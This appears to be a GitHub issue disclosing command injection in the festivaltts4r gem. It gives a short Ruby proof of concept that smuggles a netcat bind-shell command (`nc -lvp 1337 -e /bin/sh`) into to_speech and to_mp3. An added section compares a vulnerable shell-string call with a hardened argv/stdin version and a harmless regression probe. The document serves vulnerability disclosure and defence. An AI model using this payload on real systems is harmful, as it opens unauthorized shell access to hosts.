Command Injection #1

Open
@bcoles

Description

The to_speech and to_mp3 methods allow injection of arbitrary operating system commands. This may be problematic in the event user input is supplied to these methods.

Proof of concept:

```ruby
#!/usr/bin/env ruby
require "rubygems"
require "festivaltts4r"

'";nc -lvp 1337 -e /bin/sh;echo "pwned'.to_speech
'";nc -lvp 1337 -e /bin/sh;echo "pwned'.to_mp3('something.mp3')
```

```
$ ./asdf.rb
listening on [any] 1337 ...
```
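An added example, not part of the original report and not the gem's own code: the shell-string pattern that the PoC's leading `"` suggests, next to a variant that passes the text on stdin to an argv-style call. Assumptions: the interpolated `echo "..." |` command shape, `cat -` standing in for the speech engine so the block runs without festival, and a constructed harmless probe string.

```ruby
require "open3"

# Stand-in for the speech engine (assumption) so this runs without festival:
# `cat -` returns whatever text reaches its stdin.
ENGINE = ["cat", "-"].freeze

# Constructed, harmless probe with the same quote-breaking shape as the PoC.
PROBE = '";echo INJECTED;echo "tail'

# Vulnerable pattern (assumed, not the gem's source): the text is interpolated
# between double quotes in a string that /bin/sh then parses.
def speak_via_shell(text)
  out, _status = Open3.capture2("sh", "-c", "echo \"#{text}\" | #{ENGINE.join(' ')}")
  out
end

# Hardened pattern: multi-element argv starts no shell, and the text travels
# on stdin, so quotes and semicolons in it are only data.
def speak_via_argv(text)
  out, _status = Open3.capture2(*ENGINE, stdin_data: text)
  out
end

# True when the marker came back as a line of its own, i.e. the injected
# `echo` ran as a separate command instead of being part of the spoken text.
def injected?(output)
  output.lines.map(&:chomp).include?("INJECTED")
end

if __FILE__ == $PROGRAM_NAME
  puts "shell string: injected=#{injected?(speak_via_shell(PROBE))}"
  puts "argv + stdin: injected=#{injected?(speak_via_argv(PROBE))}"
end
```

The same two-function comparison works as a regression test for a fix: the probe must come back byte-for-byte from the hardened path.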
